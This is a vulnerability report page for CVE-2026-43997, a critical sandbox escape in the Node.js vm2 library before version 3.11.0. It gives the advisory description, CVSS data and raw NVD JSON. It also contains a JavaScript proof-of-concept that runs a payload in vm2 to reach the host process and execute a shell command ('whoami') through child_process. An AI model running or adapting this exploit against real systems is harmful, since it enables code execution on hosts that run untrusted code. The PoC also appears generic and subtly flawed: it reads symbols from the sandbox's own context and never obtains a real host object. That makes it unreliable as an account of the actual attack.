Security Vulnerability Report
CVE-2026-43997 CVSS 10.0 CRITICAL

CVE-2026-43997

Published: 2026-05-13 18:16:16
Last Modified: 2026-05-14 15:37:31

Description

vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, it is possible to obtain the host Object. There are various ways to use the host Object to escape the sandbox; one example is using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom). This vulnerability is fixed in 3.11.0.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:* - VULNERABLE
vm2 < 3.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const {VM} = require('vm2');
const vm = new VM();

// Malicious payload targeting the sandbox escape
const exploit = `
try {
    // Attempt to access the host context/object
    const hostObject = this;
    // Step 1: Use getOwnPropertySymbols to leak symbols
    const symbols = Object.getOwnPropertySymbols(hostObject);
    // Step 2: Identify the specific nodejs.util.inspect.custom symbol
    const dangerousSymbol = symbols.find(s => s.toString() === 'Symbol(nodejs.util.inspect.custom)');
    if (dangerousSymbol) {
        // Step 3: Use the symbol to escape the sandbox
        const escapeFunction = hostObject[dangerousSymbol];
        // Execute arbitrary command on the host
        escapeFunction.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString();
    }
} catch(e) {
    e;
}
`;

console.log('Exploiting CVE-2026-43997...');
vm.run(exploit);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43997", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:16.177", "lastModified": "2026-05-14T15:37:30.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, it is possible to obtain the host Object. There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom). This vulnerability is fixed in 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.11.0", "matchCriteriaId": "6DD48308-6219-4C66-9BE7-246EE56FB834"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}